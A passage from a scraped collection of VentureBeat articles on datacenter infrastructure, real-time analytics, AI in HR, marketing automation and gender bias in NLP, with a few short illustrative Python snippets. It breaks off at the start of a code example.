Today, digital infrastructure provider Liqid announced it had raised $100 million in series C funding from Lightrock and affiliates of DH Capital to further develop its composable infrastructure software platform, which enables businesses to configure and manage bare-metal servers with a software-defined approach. Digital infrastructure builder Equinix announced that it would be adding support for new hardware to its Equinix Metal service, essentially making a range of new Arm-based architecture and AI technology available to enterprises on demand. And Aryaka announced new product options designed to support organizations in hybrid cloud environments.

Liqid’s software-defined datacenters

Liqid’s platform is designed to enable users to configure and deploy bare-metal servers in a matter of seconds, so they can allocate resources and increase operational efficiency. This software-driven approach means that users can reallocate resources in a way that’s much more flexible than the rigid deployment options that traditional datacenter architectures offer. The release comes at a time when traditional datacenters have struggled to manage AI-centric workloads in a sustainable way. The intensive power and cooling requirements of AI workloads drive up electricity consumption and generate high carbon emissions that are not only costly for enterprises but damaging to the environment. In fact, researchers anticipate that by 2025, datacenters will account for the largest share of global electricity consumption in information and communications technology at 33%, almost as much as smartphones, networks, and TV combined (at 34% of electricity consumption).
Software-defined innovations by providers like Liqid aim to make datacenters more sustainable by increasing utilization rates and using more efficient resources that require less power and cooling.

Hybrid cloud tools from Equinix and Aryaka

Equinix will provide enterprises with access to the latest AMD Milan, Ampere Altra, and Intel Ice Lake chipsets (anticipated to reach the market in early 2022), providing organizations with on-demand access to the most powerful hardware on the market. The service will enable organizations to build scalable as-a-service offerings and gain immediate access to more processing power than they could with traditional datacenter technologies. The technology is already used by companies including Human, Solana Foundation, and Super League Gaming, which are leveraging it to build future-proof hybrid infrastructures and fulfill sustainability initiatives. It’s worth noting that Equinix’s on-demand, as-a-service hardware approach is also helping to address supply chain challenges, like the global chip shortage that’s expected to continue until 2023 and is preventing many organizations from moving to next-gen hardware. Similar innovations are coming from providers like Aryaka, which today announced a range of new products designed to support organizations in hybrid cloud environments, including Aryaka SmartConnect Pro, a performance-optimized SD-WAN, and Aryaka SmartConnect, a cost-optimized SD-WAN. This new suite of products provides organizations deploying SD-WAN and SASE architectures with cost-effective pricing models, so they have access to hardware with the performance they need to power critical business services. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings.
"
15,080
2,021
"Real-time analytics in 2022: What to expect? | VentureBeat"
"https://venturebeat.com/2021/12/31/real-time-analytics-in-2022-what-to-expect"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Real-time analytics in 2022: What to expect? Share on Facebook Share on X Share on LinkedIn Sports analytics Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Today, every company is in the process of becoming a data company. Decision-makers leverage data not just to see how their organization performed in the past few months, but also to generate detailed insights (the what and why) into business processes, operations. These analytics, driven by tools such as Tableau , inform business decisions and strategies and play a crucial role in driving efficiencies, improving financial performance, and identifying new revenue sources. A few years ago, business data used to be processed in batches for analytics. Now, real-time analytics has come on the block, where organizational data is processed and queried as soon as it is created. In some cases, the action is not taken instantly, but a few seconds or minutes after the arrival of new data. 
However, both practices are increasingly being adopted by enterprises, especially in sectors where data must be analyzed immediately to deliver products or services, understand trends, and take on rivals. After all, an ecommerce company needs instant information about when and why its payment gateway went down to ensure customer experience and retention. With historic data analyzed in batches, the detection and resolution of such an issue could easily be delayed. Here are some trends that will shape and drive the adoption of real-time analytics further in 2022.

Surge in data volumes, velocity

Continuing the trend from recent years, data volumes and velocity at the organization level will follow an upward trajectory, surging more than ever before. This, combined with the convergence of data lakes and warehouses and the need to make quick decisions, is expected to drive improvements in the response time of real-time analytics. Systems will be able to ingest massive amounts of incoming raw data – no matter whether it peaks for a few hours every day or for a few weeks every year – without latency, and faster analytical queries are likely to become possible, ensuring instant reactions to events and maximum business value. On top of that, serverless real-time analytics platforms are also expected to go mainstream, which will allow organizations to build and operate data-centric applications with infinite on-demand scaling to handle a sudden influx of data from a particular source. “Overall, 2022 will be a challenging year for keeping up with growing data volumes and performance expectations in data analytics,” Chris Gladwin, CEO and cofounder of Ocient , told VentureBeat.
“We will see more organizations looking for continuous analytics and higher resolution query results on hyperscale data sets (trillions of records) to gain deeper, more comprehensive insights from an ever-growing volume and diversity of data sources.”

Rise in developer demand

As the lines between real-time analytics (which provides instant insights to humans to make decisions) and real-time analytical applications (which automatically take decisions as events happen) continue to blur on the back of the democratization of real-time data, developers are expected to join technical decision-makers and analysts as the next big adopters of real-time analytics. According to a report from Rockset , which offers a real-time analytics database, real-time data analytics will see a sharp rise in demand from developers, who will use the technology to build data-driven apps capable of personalizing content and customer services, as well as to A/B test quickly, detect fraud, and serve other intelligent applications like automating operational processes. “Every other business is now feeling the pressure to take advantage of real-time data to provide instant, personalized customer service, automate operational decision-making, or feed ML models with the freshest data. Businesses that provide their developers [with] unfettered access to real-time data in 2022, without requiring them to be data engineering heroes, will leap ahead of laggards and reap the benefits,” Dhruba Borthakur, cofounder and CTO of Rockset, said.

Off-the-shelf real-time analytics capabilities

In 2022 and beyond, real-time analytics based on off-the-shelf capabilities is expected to become more mainstream and easier to deploy and customize, Donald Farmer, the principal of Treehive Strategy, told VentureBeat. This will be a departure from the current practice, where code is written in-house or sourced from highly specialized vendors, and will drive the adoption of real-time analytics in retail, healthcare, and the public sector.
So far, real-time analytics based on off-the-shelf capabilities has mostly been used in sectors such as transport (for customer support) and manufacturing (for monitoring production), Farmer noted. Professionally, Farmer has worked on several of the top data and analytics technologies on the market, and he previously led design and innovation teams at Microsoft and Qlik.

Business benefits across sectors

The business benefits of real-time analytics, regardless of sector, will also continue to drive adoption in 2022. As per IDC’s Future Enterprise Resiliency and Spending survey, the ability to make real-time decisions will make enterprises more nimble, boost their customer loyalty and outreach, and offer a significant advantage over the competition. Plus, continuous data analytics, which alerts users as events happen, will help improve supply chains and reduce costs, bringing fast ROI on streaming data pipeline investments. As per Rockset , one oil and gas company was able to increase its profit margins by 12% to 15% after adopting real-time analytics. Meike Escherich, associate research director for European Future of Work at IDC, notes that IDC has already recorded a significant uptake in the implementation of real-time analytics, with one in three European companies either already using it for measuring team performance or planning to do so in the next 18 months. Similarly, Gartner predicts that more than half of major new business systems will incorporate continuous data intelligence in 2022.
"
15,081
2,021
"AI-driven HR seeks to balance 'human' and 'resources' | VentureBeat"
"https://venturebeat.com/2021/08/02/ai-driven-hr-seeks-to-balance-human-and-resources"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages AI-driven HR seeks to balance ‘human’ and ‘resources’ Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Human resources (HR) is an area that is ripe for automation, and in particular, the kind of automation made possible by artificial intelligence (AI). HR, after all, is a cost center at most organizations, which means organizations are always looking for ways to keep costs as low as possible. And yet, HR is rife with complex, time-consuming processes that, so far, have required the unique logic and intuitive thinking that only humans can provide. A New World But all that is changing with the newest generations of AI-driven HR platforms. Globality’s Sonia Mathai notes that everything from hiring and onboarding to scheduling and benefits management, and all the way to termination and access control, AI is creating a new brand of HR that is leaner, more accurate, and less costly than traditional HR. 
For one thing, she says, AI-driven HR is available 24/7, delivering user-friendly services via fully conversational chatbots that provide immediate responses to most questions with no wait-listing. At the same time, AI can provide a more personalized experience thanks to its access to real-time data. And as seen with AI in other business units, all of this allows human reps to shed the rote, repetitive aspects of the job and focus on more creative, strategic solutions to endemic issues. HR is such an important function at most companies that AI should not be deployed there lightly or haphazardly, according to Thirdera CIO Jeff Gregory. In a recent interview with VentureBeat , he pointed out that HR acts as the “steward of a company” and maintains the pulse of the health and development of employees. So it must consistently present the right information even when employees do not ask the right questions. For this reason, AI must learn the ins and outs of HR processes and resource utilization just like any employee, which is why it is best for it to start small and then work its way up to more complicated and consequential functions. Be careful that AI doesn’t get you into legal trouble as well, say Eric Dunleavy, director of litigation and employment services at DCI Consulting Group, and Michelle Duncan, an attorney with Jackson Lewis. It’s one thing to use AI to prescreen applications, evaluate interviews, and mine social media. It’s quite another to have it decide who gets hired or promoted, particularly given the numerous examples of AI showing bias with regard to race, gender, age, and other factors. In the end, it is up to the company to ensure that all employees, whether human or digital, abide by established laws like Title VII of the Civil Rights Act, the Age Discrimination in Employment Act, and the Americans with Disabilities Act.
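One widely used screening heuristic for auditing selection decisions (human or algorithmic) against rules like Title VII is the EEOC’s “four-fifths rule”: if any group’s selection rate falls below 80% of the highest group’s rate, the process is flagged for adverse-impact review. The sketch below uses hypothetical numbers and is a statistical screen, not legal advice.

```python
def selection_rates(outcomes):
    """outcomes maps group name -> (selected, applicants)."""
    return {g: sel / apps for g, (sel, apps) in outcomes.items()}


def four_fifths_flags(outcomes, threshold=0.8):
    """Return True per group if its selection rate is at least `threshold`
    times the highest group's rate (the four-fifths rule)."""
    rates = selection_rates(outcomes)
    best = max(rates.values())
    return {g: (rate / best) >= threshold for g, rate in rates.items()}


# Hypothetical screening results from an automated resume filter.
outcomes = {"group_a": (45, 100), "group_b": (27, 100)}
flags = four_fifths_flags(outcomes)
# group_b's rate ratio is 0.27 / 0.45 = 0.6, below 0.8, so its results
# would warrant closer statistical and legal review.
```

A check like this is cheap to run on every model revision, which makes it a natural guardrail before an automated screen ever touches a live hiring pipeline.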
Crunching Numbers

Perhaps the most profound impact AI will have on HR is in analytics, rather than hiring or employee self-service tools. At its heart, HR is a numbers game, according to Erik van Vulpen, founder of the AIHR Academy , and AI is a whiz with numbers. For instance, AI can delve deep into turnover data to divine why employees are leaving and what can be done to correct it. AI can also assess the impact of learning and development programs, or determine which new hires will become top performers. Ultimately, this will replace the “gut feeling” approach to decision-making in traditional HR shops with one that is more data-driven and quantifiable. It’s been said that employees are the enterprise’s most valuable resource. In that light, organizations should proceed with caution when deciding how quickly and how thoroughly they want to integrate AI into their HR processes. People who take their jobs seriously might not maintain that attitude if they feel they cannot get a fair shake from an algorithm. The best way to avoid this is to ensure that AI is trained to deliver positive outcomes, preferably ones that benefit the individual and the organization alike. If this is not possible, then there should be mechanisms in place, either human-driven or artificial, explaining why a given result has emerged and what the employee may do to alter it. In the end, we all want to be treated fairly no matter who, or what, is making the decisions.
"
15,082
2,012
"Analyze this: Talent Analytics quantifies you | VentureBeat"
"https://venturebeat.com/2012/08/21/talentanalytics-quantifies-you/amp"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Analyze this: Talent Analytics quantifies you Share on Facebook Share on X Share on LinkedIn Talent Analytics measures people, weighing their preferences and motivations and how those characteristics predict job performance. "Our niche is companies who have employees," jokes founder Greta Roberts. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Talent Analytics measures people, weighing their preferences and motivations and how those characteristics predict job performance. “Our niche is companies who have employees,” jokes founder Greta Roberts. The company surveys employees and summarizes them in 12 numbers that cover work style (“What kind of tasks do you prefer? Are you detailed-oriented? Collaborative?) and motivators like creativity, bottom-line, or a sense of mission. These “talent characteristics” are not skills, which are specific to a field and change over time, but rather innate traits. 
Companies can then map the data to performance and use it for hiring or to help build complementary teams. Roberts insists that far from dehumanizing employees, talent characteristics highlight their value. “Numbers are the language of business,” Roberts explains, “and people are also numbers — but not only numbers. We have a weight and a height; that doesn’t make us less human.” Companies often trumpet their people as their greatest asset and yet rarely seem to put much effort into quantifying that asset. “People become confident when you value who they are, and they are doing things that they do well naturally,” Roberts told me. “You also start seeing people who haven’t been seen before.” One group of 250 accountants liked rules and routine (shock!) and were competitive, detail-oriented, and focused on the bottom line. Clients initially found them cold, but their talent characteristics showed that they were simply seeking information before warming up. Knowing your people can also help reframe a company’s vision of itself. One Talent Analytics customer, a forklift operator firm, constantly received complaints about customer service. The operators were not friendly, but as it turned out, they were very focused on accuracy. So the company started to highlight accuracy as its main selling point rather than trying to transform the personalities of its staff. The process can also throw up surprises. Call centers instinctively hire staff who are warm and friendly, but Talent Analytics’ analysis showed that the top performers didn’t actually meet this profile. Callers wanted a listener, not a talker, and employees who were too friendly stayed on the line too long. After all, the main performance metric in a call center is how many calls you process. Talent Analytics isn’t the only company experimenting with data-driven HR.
Google’s people-analytics team, a hodgepodge of data miners, psychologists, and MBAs, uses data to drive decisions on compensation, talent management, hiring, and other HR issues. One of the team’s better-known endeavors is Project Oxygen, Google’s quest to build a better boss, or at least identify what makes a good one. Roberts doesn’t name any direct competitors. “Our biggest competitor is people not doing anything,” she says. While there are various talent and analytics packages available that solve part of the puzzle, she says Talent Analytics is the only one that makes it easy to map people’s intrinsic characteristics onto performance. As Malcolm Forbes once said, “To measure the man, measure his heart.” Talent Analytics is based in Cambridge, Mass., has 10 employees, is privately funded, and was founded in 2002. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15083
2020
"SendinBlue raises $160 million to automate repetitive marketing tasks | VentureBeat"
"https://venturebeat.com/2020/09/30/sendinblue-raises-160-million-to-automate-repetitive-marketing-tasks/amp"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages SendinBlue raises $160 million to automate repetitive marketing tasks Share on Facebook Share on X Share on LinkedIn Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. Marketing automation startup SendinBlue today announced a $160 million funding round. A company spokesperson says the money will be put toward accelerating go-to-market efforts as it adapts to growth during the pandemic. Lockdowns and shelter-in-place orders aimed at beating back the novel coronavirus have forced marketers to fully embrace digital. According to a report published by The CMO Survey, some 60.8% of respondents indicated they’ve “shifted resources to building customer-facing digital interfaces” and 56.2% transformed their businesses to focus on digital opportunities. Moreover, marketers reported customers’ increased openness to digital offerings introduced during the pandemic and said they were likely to see greater value in digital experiences. 
SendinBlue, which was cofounded by Polytechnique graduate Armand Thiberge in 2012, competes with companies like Mailchimp and offers solutions aimed at expediting common marketing tasks. Initially focused on email, the company pivoted to address businesses’ increased demand for online acquisition and loyalty tools. Using its pipelines, clients can start by sending newsletters before diving deeper with templates and chat tools that tie into their websites. SendinBlue says these products were designed to be easy for marketers to use and are aimed at companies in industries like hospitality, construction, ecommerce, and manufacturing. SendinBlue’s platform provides a range of email, SMS, and chat messaging tools, as well as integrations with existing customer relationship management systems. Via transactional email and segmentation, customers can set up the design, engagement, and discoverability of messages and send them in a more targeted way. With landing pages, signup forms, and retargeting, those customers can create more targeted visitor experiences and grow their email contact lists while showing ads to website visitors as they browse other sites. But SendinBlue’s real differentiator lies in automation. Leveraging AI and machine learning, the company’s MailClark email bot extracts relevant content from emails, prequalifies them, and handles specific actions to optimize response time. Customers can use MailClark within the platform or integrate it with third-party apps via an API. SendinBlue claims it achieved 60% year-over-year growth even before the pandemic. Between March and June, the company saw a 50% uptick in business and reached more than 180,000 customers across over 160 countries. With 70% of SendinBlue’s revenue coming from abroad, Thiberge says he now plans to focus on international expansion. 
The startup recently opened its first office in Toronto, bringing its total number of offices to five and its headcount to over 400. SendinBlue raised $33 million in September 2017. This latest round, which was led by Bridgepoint Development Capital and BPI, brings the startup’s total raised to nearly $200 million. "
15084
2022
"How machine learning frees up creativity and strategy for marketers | VentureBeat"
"https://venturebeat.com/2022/04/09/how-machine-learning-frees-up-creativity-and-strategy-for-marketers/amp"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community How machine learning frees up creativity and strategy for marketers Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Artificial intelligence (AI) and machine learning (ML) have been massively hyped over the years. These days it seems every company is an AI/ML company — and reality is, as American researcher, scientist, and futurist Roy Amara, stated, “We tend to overestimate the effect of a technology in the short run and underestimate the effect in the long run.” When a new technology is developed or deployed, people often talk about it suddenly transforming everything in the next couple of years. However, we also tend to underestimate the effect of it entirely, especially if it is the kind of technology that could fundamentally change the way we solve marketers’ problems and interact with customers. 
If we’re going to leverage the full benefits of AI and ML, it’s important to first understand the technology and discern between the facts and fiction of how it works today. Only then can we understand what is real, how this technology can be transformative, and how machine learning and AI can free up creativity and strategic thinking for marketers. Machine learning starts with data Without the ability to analyze data, identify patterns, and put them to use, data is effectively useless. Machines are ruthless optimizers that can organize data on a level that is impossible for humans to replicate. However, this also works in reverse, as machines today cannot replicate the creative thinking and strategies that humans can generate and act on. Data optimized through machine learning gives marketers a supercharged ability to make the most informed decisions and then enact a creative strategy to achieve their desired outcome. Machine learning for marketers: Asking the right questions The things that matter to companies and to individuals are decisions and actions. Back when I used to consult for large companies spending millions or tens of millions on “data strategy” or equally poorly defined areas, I would often advise that before they start to worry about the data they need to collect, they need to start with what decisions and actions they need to take as a business. Starting from that perspective, businesses can ask themselves: What decisions do you wish you could make smarter and faster? Are you structurally set up as an organization to make those decisions? Once those are defined, you can then ask questions like: What information do I need to make these decisions faster and smarter? And which of these decisions can be automated? So, where does machine learning come in? Which category of problems can it help us with? 
In order to answer these questions, it is first useful to understand the limitations of this technology. ML does not replicate the amazing generality and adaptability of human intelligence — instead (and consistently with other technologies) it augments human intelligence and solves a more specific set of problems with superhuman capability. To work out if ML can be applied to a problem, the following set of questions is useful: Can a human solve the specific task required in less than 2 seconds? (This is a rough estimate; we have not yet reached the point of solving problems more complex than this.) Is it valuable to solve this problem repeatedly at scale (e.g., billions of times incredibly fast)? Is it valuable to do this task repeatedly, robustly, and consistently? Can we measure “success” numerically? If you can answer “yes” to these questions, then you have a problem that is a great fit for applying machine learning. (Interestingly, these are also the kind of tasks that humans are terrible at, because we get bored, distracted, and tired!) This might appear very limiting, but many problems fit into the “yes” bucket, such as identifying spam emails, detecting fraud, optimizing pricing, and making sense of language. Solving marketers’ problems with machine learning When it comes to marketing and advertising, there is a whole category of problems that also fit squarely into that “yes” bucket. Detecting audience composition and behavior changes over time, predicting whether an ad will lead to a potential customer visiting my site based on the contents of the article they are reading, and tuning thousands of parameters to ensure budgets are spent efficiently and effectively are all such marketing problems. There are also problems that do not fit into this categorization, such as: How do I convey my complex message in a way that cuts through the noise? How do I connect effectively with an audience with whom I am not currently resonating? 
How do I balance long- and short-term objectives? Machine learning is not magic: It can give marketers superhuman capabilities to find patterns in data to deepen our understanding, optimize delivery against well-defined goals, react to changes rapidly and rationally, and execute our ideas predictably, with less friction and more feedback. Interacting with customers in real time For marketing, much of the information and patterns that are useful relate to customer behavior. Digital campaigns are markedly less effective when they are unable to respond to changing conditions in the moment. To illustrate: If you are selling gourmet coffee makers, you want to reach the people who are still interested in purchasing one, not those who had been searching online for the past week and purchased one yesterday. Everyone has experienced shopping online for a product, having it arrive, and then having every device and platform they use spam them with the same product repeatedly for the next week. While this may be useful for products that customers generally continue to buy (detergent, toiletries, etc.), most people only need one gourmet coffee maker. Not only does real-time data ensure that campaigns are reaching the right people, but it also allows marketers to respond to changing market conditions. By combining machine learning with real-time data, marketers can see results live, instead of waiting for results at the end of a campaign. This means brands can detect and capitalize on things like a popular, recently released Netflix show or what’s trending on Twitter, or even address the quickly changing dynamics within the supply chain. If there is anything brands have learned over the past couple of years, it’s that world events can impact shopping behaviors and patterns in an instant. 
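The in-the-moment reaction described here ultimately rests on change detection over a live metric. A deliberately minimal sketch (the smoothing factor, threshold, and demand numbers are all invented for illustration):

```python
# A toy change detector: an exponentially weighted moving average (EWMA)
# of a metric such as hourly purchases, flagging sudden shifts.
def ewma_alerts(values, alpha=0.3, threshold=0.5):
    avg = values[0]
    alerts = []
    for i, v in enumerate(values[1:], start=1):
        # Flag the step if it deviates from the running average by
        # more than the relative threshold (here, 50%).
        if avg and abs(v - avg) / avg > threshold:
            alerts.append(i)
        avg = alpha * v + (1 - alpha) * avg
    return alerts

# Steady demand, then a spike (say, a product trends on social media).
print(ewma_alerts([100, 98, 102, 101, 99, 180, 185, 190]))
```

A production system would track many such metrics per audience segment and feed alerts into bid and budget adjustments rather than a print statement.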
While machines can take care of analyzing data around demographics, web browsing behaviors, and past purchases, having the right creative marketer — who can connect current trends to campaign goals and ensure the right questions are being asked of the machines — is what distinguishes a good campaign from a great one. To borrow another great quote, this time from Alan Kay: “Simple things should be simple, complex things should be possible.” In addition to helping us get deeper insight and understanding of audience behavior, great technology should also make it simple for marketers to react to this information by getting new creative ideas live in minutes, not months. Can ML predict the future? Predicting the future is not possible. But machine learning technology combined with real-time data can enable marketers to understand emerging trends and behavioral shifts as they happen, and make it easy to react to these changes by getting automatically optimized campaigns live in minutes and seeing whether they are working within hours and days. True progress is about learning, and about testing strategies and ideas. The underestimated impact that ML will have on the ad tech industry over the next decade will not come from AI-generated ideas or reduced dollars spent on operations; the big impact will come from shortening the gaps between marketing strategy, insight, idea, and execution, and from allowing us to understand more deeply and quickly, be more creative, test ideas more confidently and easily, and measure impact more effectively. This technology — like all other technologies — is not here to replace humans, but to free us from the repetitive and tedious and empower us to be superhuman. Peter Day is CTO of Quantcast. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. 
If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! "
15085
2020
"We can reduce gender bias in natural-language AI, but it will take a lot more work | VentureBeat"
"https://venturebeat.com/2020/12/06/we-can-reduce-gender-bias-in-natural-language-ai-but-it-will-take-a-lot-more-work"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest We can reduce gender bias in natural-language AI, but it will take a lot more work Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Thanks to breakthroughs in natural language processing ( NLP ), machines can generate increasingly sophisticated representations of words. Every year, research groups release more and more powerful language models — like the recently announced GPT-3, M2M 100, and MT-5 — that are able to write complex essays or translate text into multiple languages with better accuracy than previous iterations. However, since machine learning algorithms are what they eat (in other words, they function based on the training data they ingest), they inevitably end up picking up on human biases that exist in language data itself. This summer, GPT-3 researchers discovered inherent biases within the model’s results related to gender, race, and religion. 
Gender biases included the relationship between gender and occupation, as well as gendered descriptive words. For example, the algorithm predicted that 83% of 388 occupations were more likely to be associated with a male identifier. Descriptive words related to appearance, such as “beautiful” or “gorgeous,” were more likely to be associated with women. When gender (and many other) biases are so rampant in our language and in the language data we have accumulated over time, how do we keep machines from perpetuating them? What is bias in AI? Generally speaking, bias is a prejudice for or against one person or group, typically in a way considered to be unfair. Bias in machine learning is defined as an error from incorrect assumptions in the algorithm or, more commonly, systemic prediction errors that arise from the distribution properties of the data used to train the ML model. In other words, the model consistently makes the same mistakes related to certain groups of individuals. In NLP, both kinds of bias are relevant. The pre-existing biases in our society affect the way we speak and write. Written words are ultimately used to train machine learning systems. When we train our models using biased data, it gets incorporated into our models, which preserves and confirms existing biases. This happens because machines consume language differently than humans do. Simply put, words are represented by lists of numbers called word embeddings that encode information about the word’s meaning, usage, and other properties. Computers “learn” these values for every word after consuming training data of many millions of lines of text, where words are used in their natural contexts. 
Since word embeddings are numbers, they can be visualized as coordinates in a plane, and the distance between words — more precisely, the angle between them — is a way of measuring how similar they are semantically. These relationships can be used to generate analogies. Some terms, like king and queen, are inherently gendered. Other terms, such as those related to occupation, should not be intrinsically gendered. However, in the GPT-3 research example cited above, the machine guessed that professions requiring higher levels of education were heavily male-leaning (such as banker or professor emeritus), while professions such as midwife, nurse, receptionist, and housekeeper were heavily female-leaning. Professions qualified as “competent” were heavily male-leaning. Results like this happen again and again within different machine learning models and algorithms, not just GPT-3. These are obviously not the ideal outcomes. Machine learning systems are no better than the data they consume. Most people assume that more data yields better-performing models. Often, the best way to get more data is to choose large, web-crawled datasets. Since the internet and other content is made up of real, human language, the data will naturally exhibit the same biases that humans do. Unfortunately, not enough attention is paid to the content within these web-crawled datasets. Reducing AI’s gender bias Not only are some of the analogies generated by machine learning models offensive, they are also inaccurate. If we want machine learning systems to be more accurate and fair, having humans in the loop is one of the best ways to reduce the risk of gender-biased training data. Humans can correct machines’ errors and provide feedback that helps refine algorithms over time. But there are certainly more fundamental steps that machine learning engineers can take to reduce gender bias in NLP systems. One of the most intuitive methods is to modify the training data. 
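The geometry described above, with similarity measured by the angle between word vectors, can be made concrete with toy numbers. The 2-D vectors below are invented for illustration; real embeddings are learned from text and have hundreds of dimensions:

```python
import math

# Toy 2-D "word embeddings", invented for this sketch.
vecs = {
    "he":     [1.0, 0.1],
    "she":    [-1.0, 0.1],
    "doctor": [0.7, 0.9],
    "nurse":  [-0.6, 0.9],
}

def cosine(a, b):
    # Cosine of the angle between two vectors: 1.0 means identical
    # direction, 0 means unrelated, negative means opposed.
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.hypot(*a) * math.hypot(*b))

# Projecting occupation words onto the he-she direction exposes the
# kind of learned gender association discussed in the text.
gender_axis = [h - s for h, s in zip(vecs["he"], vecs["she"])]
print(cosine(vecs["doctor"], gender_axis))  # positive: leans toward "he"
print(cosine(vecs["nurse"], gender_axis))   # negative: leans toward "she"
```

Projections like this onto a he-she axis are one common way researchers quantify occupation bias in embedding spaces.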
If we know our models learn bias from data, perhaps de-biasing the data is the best approach. One such technique is “gender-swapping,” where the training data is augmented so that for every gendered sentence, an additional sentence is created, replacing pronouns and gendered words with those of the opposite gender and substituting names with entity placeholders. For example, “Mary hugged her brother Tom” would also create “NAME-1 hugged his sister NAME-2.” This way, the training data becomes gender-balanced and also does not learn any gender characteristics associated with names. For example, this approach would prevent gendered career analogies given by the model, because it would have seen computer programmers in male and female contexts an equal number of times. It is important to note that this approach is straightforward for English but much more challenging for other languages. For example, in Romance languages, such as French, Portuguese, or Spanish, there is no neutral grammatical gender. Adjectives and other modifiers in these languages express gender as well. As a result, a different approach is required. Another method, specific to machine translation, that helps translations be more gender-accurate involves adding metadata to the sentences that stores the gender of the subject. For example, while the sentence “You are very nice” is gender-ambiguous in English, if the parallel Portuguese sentence were “Tu és muito simpática,” a tag could be added to the beginning of the English sentence so the model could learn the correct translation. After training, if someone requests a translation and supplies the desired gender tag, the model should return the correct one and not just the majority gender. 
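The metadata approach reads naturally as a preprocessing step over parallel sentence pairs. A minimal sketch, with invented tag tokens and a toy word-ending rule standing in for the trained gender classifier a real pipeline would use:

```python
# Toy cue list: Portuguese words whose feminine form signals a feminine
# subject. Invented for illustration; a real system classifies gender
# with a trained model, not a lookup.
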